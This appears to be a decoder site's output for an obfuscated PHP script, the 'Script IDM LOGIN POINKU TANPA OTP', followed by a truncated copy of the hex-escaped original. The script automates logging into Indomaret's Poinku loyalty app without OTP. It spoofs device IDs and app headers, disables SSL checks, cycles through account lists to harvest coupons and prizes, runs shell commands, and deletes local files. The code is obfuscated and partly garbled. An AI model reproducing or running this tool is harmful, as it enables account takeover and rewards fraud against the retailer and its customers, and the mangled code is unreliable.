  goto MT4VT; 
  l7PYF: 
  u7NvT: 
  goto kAo2I; 
  UFeHI: 
  goto ywALj; 
  goto h9vq8; 
  qYGDe: 
  echo "
"; 
  goto UdB79; 
  mN1x6: 
  $yy9BI; 
  goto Sc9EK; 
  b1o_O: 
  goto gbJTu; 
  goto nGlsv; 
  oQe5O: 
  $m5BZY = GgGr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto Lv8Tl; 
  x2BCx: 
  echo "
"; 
  goto yVAZE; 
  LRQ9s: 
  echo @zm6IC("yellow", "Build By FERDY RAMADHAN "); 
  goto dVT5w; 
  tX9Oi: 
  $QRhbE = explode("
", @file_get_contents("forceclose")); 
  goto VDs_x; 
  fkcuz: 
  echo @Zm6Ic("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto sZ35R; 
  NGTs5: 
  die; 
  goto mPckR; 
  PlUQs: 
  goto V36mw; 
  goto TNk5I; 
  EOL7D: 
  $DxrJr = "100000000000000000"; 
  goto w0IcM; 
  OeKCs: 
  echo @Zm6ic("green", $wd9cN); 
  goto VXKB5; 
  OCtqu: 
  @unlink("poinhp.php"); 
  goto NR5YR; 
  OpF1q: 
  goto mXaLJ; 
  goto HVusa; 
  NR5YR: 
  echo "\xa"; 
  goto BYxXO; 
  T8xTD: 
  PG5CP: 
  goto lxWr0; 
  WH0T2: 
  goto xrVSZ; 
  goto BqavN; 
  WkvW9: 
  goto itKyS; 
  goto pqL5O; 
  oR6TB: 
  $N0ol8 = XwL4L(); 
  goto nMz0f; 
  VTNC_: 
  $U_EVz = @$owfHy["data"][0]["subDistrict"]["subDistrictCode"]; 
  goto u7ReR; 
  gI0WO: 
  if (!($fUekS == '')) { 
    goto vR5mg; 
  } 
  goto g13L4; 
  cirbZ: 
  echo "\xa"; 
  goto Lqpb5; 
  nOHFN: 
  $qtgR3 = "0"; 
  goto CZ_oJ; 
  ayaqJ: 
  $efQM2 = count($QRhbE) - 1; 
  goto F_rzk; 
  J4tGg: 
  $yPeiy = @$H1g60["refreshToken"]; 
  goto EBBgy; 
  DyuhB: 
  $Q6vWf = @$lImQC["data"]["content"][12]["couponCode"]; 
  goto KEzEt; 
  UOEEY: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto cXup3; 
  r7FiT: 
  echo "
"; 
  goto zAuJD; 
  jBZZl: 
  echo @zm6ic("yellow", "Email Penerima : "); 
  goto FxbAU; 
  w30J6: 
  $efQM2 = count($QRhbE) - 1; 
  goto SWeRy; 
  MT4VT: 
  echo @zm6IC("yellow", "Jumlah Quota  : "); 
  goto pWpjD; 
  Ahdwh: 
  goto OTLN4; 
  goto yiSTB; 
  CzdBB: 
  $ucJzj = @$lImQC["data"]["content"][14]["couponName"]; 
  goto Uy_YH; 
  M6z1l: 
  echo @ZM6IC("yellow", "Status Pecahin Biji : "); 
  goto ctI1q; 
  QshuZ: 
  if (!($fUekS == '')) { 
    goto NLSP5; 
  } 
  goto KhDEm; 
  feVpL: 
  function I00f8($lEbop, $eOlDi, $tj7_x, $LgWaY) 
  { 
    goto qypGw; 
    Hs0M5: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto vFmgZ; 
    vFmgZ: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto MQ5S3; 
    tp9EL: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto KdCNu; 
    DmmfM: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto TbuFE; 
    JiQ2P: 
    $AXlcQ = json_decode($y7f11, true); 
    goto Cpm6m; 
    azkcU: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto DmmfM; 
    kxsuN: 
    Wk8ay: 
    goto IuFQD; 
    qypGw: 
    $C6npe = curl_init(); 
    goto ku5Ag; 
    ku5Ag: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto fTd7I; 
    pwTTx: 
    $ruc3h[] = "Host: edtsapp.indomaretpoinku.com"; 
    goto tp9EL; 
    fTd7I: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto azkcU; 
    t0Awd: 
    YvOUs: 
    goto JiQ2P; 
    Cpm6m: 
    print_r($AXlcQ); 
    goto Q0lKp; 
    HqXzg: 
    if (!$P7lm9) { 
      goto Wk8ay; 
    } 
    goto qPZdK; 
    qPZdK: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto iV79d; 
    Q0lKp: 
    return $ECuqv; 
    goto C9VP9; 
    zOq3U: 
    goto YvOUs; 
    goto kxsuN; 
    IuFQD: 
    return false; 
    goto t0Awd; 
    RqP5D: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto ymrfV; 
    iV79d: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto zOq3U; 
    MQ5S3: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto RqP5D; 
    fNDXb: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto HqXzg; 
    KdCNu: 
    $ruc3h[] = "{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $tj7_x . "","device_id":"" . $eOlDi . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto Hs0M5; 
    ymrfV: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto CiUXS; 
    CiUXS: 
    $ECuqv = curl_exec($C6npe); 
    goto fNDXb; 
    TbuFE: 
    $ruc3h[] = "authorization: Bearer " . $LgWaY; 
    goto pwTTx; 
    C9VP9: 
  } 
  goto CAqX2; 
  pJUW3: 
  echo "\xa"; 
  goto fpw_v; 
  SWo9o: 
  H9U4H: 
  goto X2LRu; 
  ohdy7: 
  $Gukt8 = $eqo_P; 
  goto O2W6_; 
  msggy: 
  shell_exec("start chrome "https://barcode.tec-it.com/barcode.ashx?data="" . $zn5zd . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto Uj8_1; 
  ihLm0: 
  $YXsOG = @$Ap1KM["message"]; 
  goto dhjGK; 
  Dv40u: 
  BIMja: 
  goto Y7GSJ; 
  E3UbE: 
  if (!($cPDPt == 4)) { 
    goto sfkUi; 
  } 
  goto fWyr0; 
  kTSvg: 
  echo @Zm6IC("yellow", "| WA 082176358295 
"); 
  goto vG0Az; 
  FhWKb: 
  $owfHy = json_decode($Jk9cx, true); 
  goto yncKT; 
  ZnmJM: 
  echo "
"; 
  goto AHwgY; 
  WvdVD: 
  if (!($zcN5u == '')) { 
    goto FIsIZ; 
  } 
  goto QVT4_; 
  O1aXH: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto BIJOG; 
  cMepj: 
  $YXsOG = @$Ap1KM["message"]; 
  goto vXYtL; 
  ypXdS: 
  $wlJRC = XozB4(array("|"), $wZnHP)[1]; 
  goto BdILS; 
  ubtTf: 
  $aY0el = $v1ZMX; 
  goto lFjF7; 
  GSEf6: 
  @unlink("poinhp.php"); 
  goto QDJgG; 
  uyuCs: 
  echo "\xa"; 
  goto XniUI; 
  V3qBg: 
  $GOXkU = $w5ulg; 
  goto scrxk; 
  oR8Sv: 
  echo @Zm6ic("nevy", " | Script IDM LOGIN POINKU TANPA OTP\xa"); 
  goto JoF2q; 
  h9f4o: 
  UWLRz: 
  goto J_QAU; 
  H3Rse: 
  goto skjRn; 
  goto BOyow; 
  OzzD7: 
  echo "\xa"; 
  goto hx1RQ; 
  MxiV2: 
  echo @Zm6Ic("nevy", "Pilih Kelurahan Mana ? : "); 
  goto kz8l7; 
  mxI0I: 
  goto w5u0B; 
  goto vdihH; 
  wvA9a: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto wzo6j; 
  svrS2: 
  @unlink("poinhp.php"); 
  goto OWQFJ; 
  jdGHB: 
  $zn5zd = $U0YgX; 
  goto JIZH5; 
  bNJdD: 
  $Jk9cx = g8Pf2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/sy-app-version/get-version-key/ANDROID", $aY0el, $GOXkU, $mlMLt); 
  goto naXLO; 
  w1dsu: 
  echo @Zm6iC("nevy", "Akun Ke    : "); 
  goto ktT1F; 
  XZK0M: 
  $H1g60 = json_encode($IKJzx, true); 
  goto rHfbp; 
  Wyaqr: 
  if (!($cPDPt == 2)) { 
    goto kQ7gd; 
  } 
  goto tmEqL; 
  hNZdX: 
  echo "\xa"; 
  goto XJ4uX; 
  u8rId: 
  kQ7gd: 
  goto Fr1xl; 
  WdaDw: 
  @unlink("poinhp.php"); 
  goto xr6FM; 
  SwrwN: 
  $DxrJr = "100000000000000000"; 
  goto Nz0TL; 
  Fpl08: 
  $pugmZ = @$owfHy["data"][0]["postalCodeId"]; 
  goto p1Pvo; 
  CeZ6r: 
  echo @Zm6iC("red", $zn5zd); 
  goto L1Xq4; 
  sxiVh: 
  function Pcm6T($lEbop) 
  { 
    goto PqQvA; 
    q1aGT: 
    if (!$P7lm9) { 
      goto t0lzY; 
    } 
    goto PTyLo; 
    qmCoA: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto lgzv4; 
    xUy_Z: 
    return $ECuqv; 
    goto fprn_; 
    pqHYy: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto Fj1Oi; 
    SB3xR: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto CEhj0; 
    aAyGV: 
    goto xbz9p; 
    goto uER8H; 
    wNCI1: 
    xbz9p: 
    goto MFVjt; 
    ZOmuG: 
    $ECuqv = curl_exec($C6npe); 
    goto PjdjV; 
    MFVjt: 
    $AXlcQ = json_decode($y7f11, true); 
    goto oiPjV; 
    ehL7E: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto W3xvF; 
    CEhj0: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto t0aKc; 
    lgzv4: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto ehL7E; 
    HgthA: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto aAyGV; 
    PqQvA: 
    $C6npe = curl_init(); 
    goto qmCoA; 
    W3xvF: 
    $ruc3h[] = "User-Agent: okhttp/5.0.0-alpha.5"; 
    goto pqHYy; 
    uER8H: 
    t0lzY: 
    goto coZ3r; 
    coZ3r: 
    return false; 
    goto wNCI1; 
    PjdjV: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto q1aGT; 
    t0aKc: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto ZOmuG; 
    oiPjV: 
    print_r($AXlcQ); 
    goto xUy_Z; 
    OzSAE: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto SB3xR; 
    PTyLo: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto HgthA; 
    Fj1Oi: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto OzSAE; 
    fprn_: 
  } 
  goto h2nah; 
  yvqsu: 
  echo @zm6iC("nevy", $ZNU2M); 
  goto uyuCs; 
  kJkzB: 
  shell_exec("start chrome "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto penYb; 
  UAyjl: 
  if (!($fUekS == '')) { 
    goto H9U4H; 
  } 
  goto ZHFaV; 
  wdlw0: 
  echo "\xa"; 
  goto dTj8e; 
  HrweK: 
  $mlMLt = $obc_G; 
  goto MIRP3; 
  WGRLf: 
  if (!($l9PIA == '')) { 
    goto JyBDM; 
  } 
  goto q3S0N; 
  ZtjOR: 
  fl6lv: 
  goto UXRYi; 
  syYB4: 
  $jTEU0++; 
  goto HK40j; 
  pe2QH: 
  echo "
"; 
  goto w7yv5; 
  ijTty: 
  echo "\xa"; 
  goto Gni3W; 
  yuVmv: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto QwxVQ; 
  LCM7I: 
  print_r($XTuz1); 
  goto wak68; 
  JXPEQ: 
  $tqWr2 = $zvt88[0]; 
  goto O9ca7; 
  NqQix: 
  @unlink("poinhp.php"); 
  goto BH7Bk; 
  ReqYZ: 
  echo @Zm6iC("green", "Mau Tukar Produk Mana ? : "); 
  goto XQkYc; 
  LyT7u: 
  $nb9cm = round(microtime(true) * 1000); 
  goto QLRL1; 
  udatF: 
  goto aOh1Q; 
  goto w_yIX; 
  z8qyV: 
  echo @zm6ic("nevy", $WtCiL); 
  goto noF8q; 
  NDC6U: 
  echo "
"; 
  goto Hl0fv; 
  OXStz: 
  if (!($jTEU0 < $S8W9D)) { 
    goto FBh50; 
  } 
  goto Lw5kj; 
  pRlaN: 
  echo "\xa"; 
  goto utKOm; 
  kWk_Z: 
  echo @zm6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto ganFQ; 
  lY4tW: 
  if ($PKr5B == "Diskon Rp 25.000 Klik Indomaret") { 
    goto SCsGz; 
  } 
  goto VQBza; 
  gl2qM: 
  $WYrgv = @$H1g60["fid"]; 
  goto PbA2u; 
  j1Osj: 
  die; 
  goto WxP0S; 
  ZQ2mS: 
  j7pkX: 
  goto nDicY; 
  VwnFr: 
  echo "\xa"; 
  goto LLojs; 
  BOv0N: 
  y2l5l: 
  goto Rfnnj; 
  A2BXs: 
  goto itKyS; 
  goto Kk5nB; 
  ZQW9J: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto p1xRY; 
  n_WdW: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto x7MT3; 
  udJYZ: 
  echo "Sampai Baris Ke : "; 
  goto Plsof; 
  jd00O: 
  die; 
  goto t6k9h; 
  TeXIq: 
  $k1y0B = g1wXT("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/remove-isaku-token", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto G3G3e; 
  tcJMt: 
  $wDisp = "{"customerGameId":"" . $ypyz5 . ""}"; 
  goto xSEI4; 
  cqT9Y: 
  echo @zm6ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto CAPOM; 
  FOA_7: 
  echo @ZM6ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto M3PcJ; 
  sWeiZ: 
  $wDisp = "{"city":" . $JrTpE . ","cityName":"" . $b2ucB . "","district":" . $L1qpJ . ","districtName":"" . $yJiD4 . "","keyword":"" . $ZqwwP . "","province":" . $Ipl73 . ","provinceName":"" . $K4tCB . ""}"; 
  goto fDalJ; 
  al2pj: 
  $u35jw = count($m0f8X) - 1; 
  goto qducy; 
  ICV3b: 
  echo @ZM6IC("yellow", "| WA 082176358295 
"); 
  goto R3mvs; 
  Os2_6: 
  echo @ZM6IC("yellow", "Tanggal Expired : "); 
  goto Crsbt; 
  DIopi: 
  echo "\xa"; 
  goto lfA_D; 
  t4a2M: 
  $rVPVc = trim(fgets(STDIN)); 
  goto W8yAD; 
  mF3S_: 
  $aY0el = $v1ZMX; 
  goto tsqUz; 
  i_i2N: 
  echo "
"; 
  goto p29CQ; 
  itd9E: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"activity_details":"resume_app","event_name":"app_activity","event_timestamp":" . $nb9cm . "},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto wabM5; 
  bb1uz: 
  echo "\xa"; 
  goto t5Qik; 
  g8ynI: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto CfXzE; 
  ot1CO: 
  echo shell_exec("xdg-open "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto phNSJ; 
  UNWVG: 
  echo "\xa"; 
  goto AdPvR; 
  rPYX1: 
  $yy9BI = "0"; 
  goto PLeOQ; 
  WtOtG: 
  @unlink("chace"); 
  goto UYqSC; 
  FxbAU: 
  echo @zm6iC("nevy", $SD3v6); 
  goto RM5B6; 
  X9ZA_: 
  echo @zM6ic("red", "Script Expired, Hubungi Creator https://wa.me/6282176358295\xa"); 
  goto t2sPb; 
  k0G65: 
  function XuulN($PGTBJ) 
  { 
    goto iEXTs; 
    Rni4n: 
    session_write_close(); 
    goto TZitq; 
    Ps_ce: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto vfRk9; 
    QzYCJ: 
    return $ECuqv; 
    goto YPM0c; 
    YlIc8: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto LOY7a; 
    iEXTs: 
    $C6npe = curl_init(); 
    goto mdNCX; 
    G9kCp: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto CFzIB; 
    jYKhb: 
    $ruc3h[] = "Origin: https://www.whatismyip.com"; 
    goto nhUX1; 
    TZitq: 
    $ECuqv = curl_exec($C6npe); 
    goto G9kCp; 
    MLk8t: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto AAZNC; 
    YxCV8: 
    $ruc3h[] = "Accept: */*"; 
    goto jYKhb; 
    mdNCX: 
    curl_setopt($C6npe, CURLOPT_URL, "https://api.whatismyip.com/wimi.php"); 
    goto MLk8t; 
    nhUX1: 
    $ruc3h[] = "Referer: https://www.whatismyip.com/"; 
    goto YTMrX; 
    CFzIB: 
    if ($P7lm9) { 
      goto QcxQE; 
    } 
    goto XsYn6; 
    AAZNC: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto iPIxn; 
    Moyxu: 
    QcxQE: 
    goto JsV4E; 
    XsYn6: 
    return false; 
    goto Moyxu; 
    iPIxn: 
    curl_setopt($C6npe, CURLOPT_CUSTOMREQUEST, "GET"); 
    goto W996Y; 
    EitVd: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto Ps_ce; 
    eWHNo: 
    print_r($AXlcQ); 
    goto QzYCJ; 
    W996Y: 
    $ruc3h[] = "User-Agent: " . $PGTBJ; 
    goto YxCV8; 
    LOY7a: 
    $AXlcQ = json_decode($y7f11, true); 
    goto eWHNo; 
    PvK2z: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto q5lYY; 
    JsV4E: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto YlIc8; 
    vfRk9: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto PvK2z; 
    q5lYY: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto Rni4n; 
    YTMrX: 
    $ruc3h[] = "Accept-Language: en-US,en;q=0.9"; 
    goto EitVd; 
    YPM0c: 
  } 
 ?>

Did this file decode correctly?

Original Code

?><?php
  $uuid = shell_exec("whoami");
  $clear = shell_exec("clear");
  echo $clear;
  goto CFWEW;
  s02R6:
  goto k9jad;
  goto VYZr6;
  uXokT:
  $ldzeo = @$owfHy["\144\141\164\x61"][$dQ8Tp]["\x73\165\142\104\151\x73\x74\162\x69\x63\x74"];
  goto xloGc;
  x7k_T:
  if (!($yy9BI < $DxrJr)) {
    goto wCiUR;
  }
  goto y7067;
  W039g:
  $zn5zd = $U0YgX;
  goto zxkeE;
  M4H3E:
  f7coE:
  goto n6abN;
  qmkK5:
  $v1ZMX = str_replace("\xd", '', $wPFxB);
  goto kfZ6v;
  HLOQc:
  echo $jTEU0;
  goto NF9qG;
  Zr0sp:
  zbRuM:
  goto e1JPg;
  ytCGQ:
  echo @Zm6iC("\160\x75\162\160\154\145", "\115\x65\155\142\x65\x72\x20\111\x44\40\x3a\x20");
  goto KvSHm;
  tmNUb:
  echo @zM6Ic("\x6e\145\x76\171", "\x5b\x33\135\x20{$eAEyy}\x20\xa\x20\40\x20\40\76\40{$PEd4h}\40\xa\12");
  goto h2hMj;
  jn4R5:
  dDvxi:
  goto MxBPD;
  Yj7KY:
  $H1g60 = json_encode($IKJzx, true);
  goto rouo1;
  ShFpT:
  $wDisp = "\173\42\x70\x68\157\x6e\145\x4e\165\155\142\x65\x72\x22\x3a\x22" . $zn5zd . "\x22\x2c\42\157\x74\x70\42\x3a\x22" . $hdCXp . "\x22\54\x22\144\x65\166\x69\x63\145\111\144\42\x3a\x22" . $aY0el . "\42\175";
  goto TaSZC;
  ElGmQ:
  $ABmxY = @$nPb0z["\x6d\145\x73\163\x61\x67\x65"];
  goto Y7Sve;
  WL3hT:
  w5u0B:
  goto OZZQb;
  h560o:
  echo $jTEU0;
  goto XgYhk;
  oo0u7:
  die;
  goto VZLLC;
  zZPco:
  $OtngW = $eqo_P;
  goto dGJoR;
  hJjFO:
  if ($Ia9Ix == "\123\124\101\124\125\123\x5f\127\x41\x49\x54\137\103\x4f\x44\105") {
    goto MGApE;
  }
  goto mvWXh;
  zmvS8:
  $earOL = $sONlZ;
  goto AU3Y9;
  TfY0U:
  echo "\xa";
  goto TKtco;
  IcyUK:
  @unlink("\57\163\x74\157\162\x61\x67\x65\57\145\x6d\165\x6c\141\x74\x65\x64\57\x30\57\x41\156\x64\162\157\x69\x64\x2f\x79\157\x75\162");
  goto rbODu;
  CPIBf:
  $efQM2 = count($QRhbE) - 1;
  goto Smrqq;
  WiRh7:
  $J0Fkh = @$owfHy["\x64\141\x74\x61"]["\x63\x6f\156\x74\x65\156\x74"][$D2zwh]["\161\x75\157\x74\x61"];
  goto zEG1z;
  Lw8nc:
  @unlink("\160\157\151\x6e\x68\160\56\x70\x68\160");
  goto qy0y7;
  m1yWR:
  echo @Zm6IC("\x79\x65\154\x6c\x6f\x77", "\x5b\x39\135\x20{$kkTa0}\40\12\x20\x20\x20\x20\x3e\x20{$zV17j}\x20\12\12");
  goto Nibkp;
  nabnt:
  echo @zm6ic("\147\162\x65\x65\156", $LgiFv);
  goto X8Xws;
  i4D_W:
  $BeKks = @$lImQC["\144\x61\164\141"]["\143\157\x6e\164\145\x6e\x74"][4]["\143\157\x75\160\x6f\x6e\x4e\141\x6d\x65"];
  goto CpSYw;
  BOyow:
  KfEmL:
  goto Ik2ui;
  YzEEQ:
  if (password_verify($Gukt8, $Jst1j)) {
    goto aX9fj;
  }
  goto F_w9s;
  hS2Td:
  echo @ZM6ic("\156\145\166\x79", $YXsOG);
  goto jmvmq;
  dvyLA:
  die;
  goto Zr0sp;
  jiC8F:
  $pew2b = @$lImQC["\x64\x61\164\141"]["\x63\x6f\156\164\x65\x6e\164"][2]["\143\157\x75\x70\157\156\x4e\x61\x6d\145"];
  goto CS_fX;
  G3G3e:
  $wDisp = "\x7b\42\x70\x68\157\x6e\145\x4e\x75\x6d\x62\x65\x72\42\x3a\x22" . $zn5zd . "\42\x2c\42\x64\145\166\x69\x63\x65\111\x64\42\x3a\x22" . $aY0el . "\x22\x7d";
  goto IU21L;
  EtLfU:
  $kbWoT = @$lImQC["\x64\141\164\141"]["\x63\x6f\x6e\164\145\156\x74"][6]["\143\157\x75\160\x6f\x6e\x4e\x61\x6d\145"];
  goto XN9Lf;
  oeXWG:
  $xT15V = g8pf2("\150\164\x74\160\163\72\57\57\x65\x64\x74\163\x61\x70\160\x2e\151\156\x64\157\155\x61\x72\x65\x74\160\x6f\151\156\153\x75\56\143\x6f\155\x2f\x6c\x6f\171\141\154\x74\x79\x2f\141\x70\151\170\55\61\x35\60\62\55\x61\160\151\x2f\155\x6f\x62\151\x6c\145\57\143\157\x69\156\x73\x2f\x70\162\151\172\x65\x73\x2f", $aY0el, $GOXkU, $mlMLt);
  goto dYDYD;
  cSbKL:
  PlP0m:
  goto p9NyH;
  QV7b_:
  $obc_G = str_replace("\xd", '', $wlJRC);
  goto HrweK;
  HBaZy:
  echo "\xa";
  goto W62An;
  bBsji:
  function zf9za($lEbop)
  {
    goto Bbq9a;
    Bbq9a:
    $C6npe = curl_init();
    goto hZKn9;
    Eeq01:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto vLJjE;
    igs59:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto w5IBj;
    dBNc_:
    return false;
    goto lhHhx;
    VWDiH:
    return $ECuqv;
    goto DY1VY;
    hZKn9:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto lnnmH;
    bz0w4:
    $AXlcQ = json_decode($y7f11, true);
    goto jwfiq;
    WS1wn:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto uP62n;
    wO2TC:
    $ruc3h[] = "\103\x6f\x6e\156\x65\143\164\x69\157\x6e\x3a\x20\x4b\145\145\160\x2d\101\x6c\151\x76\x65";
    goto WS1wn;
    vLJjE:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x6b\x6c\151\x6b\x2e\x74\x78\x74");
    goto kKNwl;
    P0ulG:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto hzUs4;
    jwfiq:
    print_r($AXlcQ);
    goto VWDiH;
    ibygb:
    $P7lm9 = curl_getinfo($C6npe);
    goto qh8Gy;
    sGEkZ:
    kox8y:
    goto dBNc_;
    uP62n:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto Eeq01;
    qh8Gy:
    if (!$P7lm9) {
      goto kox8y;
    }
    goto R2700;
    kKNwl:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\153\154\151\153\56\164\x78\x74");
    goto kIZJD;
    lhHhx:
    gAWbF:
    goto bz0w4;
    hzUs4:
    $ruc3h[] = "\x55\x73\145\162\x2d\x41\x67\x65\x6e\x74\72\40\x6f\x6b\150\164\164\160\57\65\x2e\60\x2e\x30\55\141\x6c\160\x68\141\56\x35";
    goto wO2TC;
    R2700:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto igs59;
    lnnmH:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto P0ulG;
    kIZJD:
    $ECuqv = curl_exec($C6npe);
    goto ibygb;
    w5IBj:
    goto gAWbF;
    goto sGEkZ;
    DY1VY:
  }
  goto bEj5j;
  fa7Dr:
  function u0ban($lEbop)
  {
    goto b5B_R;
    n1LF1:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto boHQv;
    VEcVY:
    $P7lm9 = curl_getinfo($C6npe);
    goto ZKsEK;
    YA2pt:
    cj2w7:
    goto FopzA;
    On3VX:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto n1LF1;
    ZIqRb:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto vUgbs;
    oSdQI:
    $ruc3h[] = "\x43\x6f\156\x6e\145\143\x74\151\x6f\156\72\x20\113\x65\x65\x70\x2d\x41\154\x69\x76\145";
    goto ZIqRb;
    FopzA:
    $AXlcQ = json_decode($y7f11, true);
    goto NQSQX;
    vUgbs:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto iLLnM;
    b5B_R:
    $C6npe = curl_init();
    goto C8Cys;
    rH6eT:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\153\x6c\151\153\56\164\170\164");
    goto zFfZZ;
    boHQv:
    $ruc3h[] = "\x55\x73\145\162\55\101\147\x65\x6e\164\72\40\x6f\153\x68\164\x74\x70\57\x35\56\60\x2e\60\55\x61\154\160\x68\141\x2e\65";
    goto oSdQI;
    fyLaj:
    return $ECuqv;
    goto dfKdo;
    ZKsEK:
    if (!$P7lm9) {
      goto YbXsN;
    }
    goto jUuFK;
    UYlTQ:
    return false;
    goto YA2pt;
    C8Cys:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto On3VX;
    jUuFK:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto jyKyU;
    d6Dkv:
    YbXsN:
    goto UYlTQ;
    jyKyU:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto ILlhR;
    NQSQX:
    print_r($AXlcQ);
    goto fyLaj;
    zFfZZ:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\153\154\151\x6b\x2e\x74\170\x74");
    goto LVk7H;
    ILlhR:
    goto cj2w7;
    goto d6Dkv;
    iLLnM:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto rH6eT;
    LVk7H:
    $ECuqv = curl_exec($C6npe);
    goto VEcVY;
    dfKdo:
  }
  goto NVl_i;
  VUaXz:
  echo @ZM6IC("\162\x65\x64", "\116\x4f\124\111\103\105\40\x21\41\x20\72\40\12");
  goto xUip9;
  UWuvP:
  $nb9cm = round(microtime(true) * 1000);
  goto sNEus;
  VauNH:
  echo @zM6IC("\x72\145\144", $D2zwh);
  goto FsFpb;
  L05Ik:
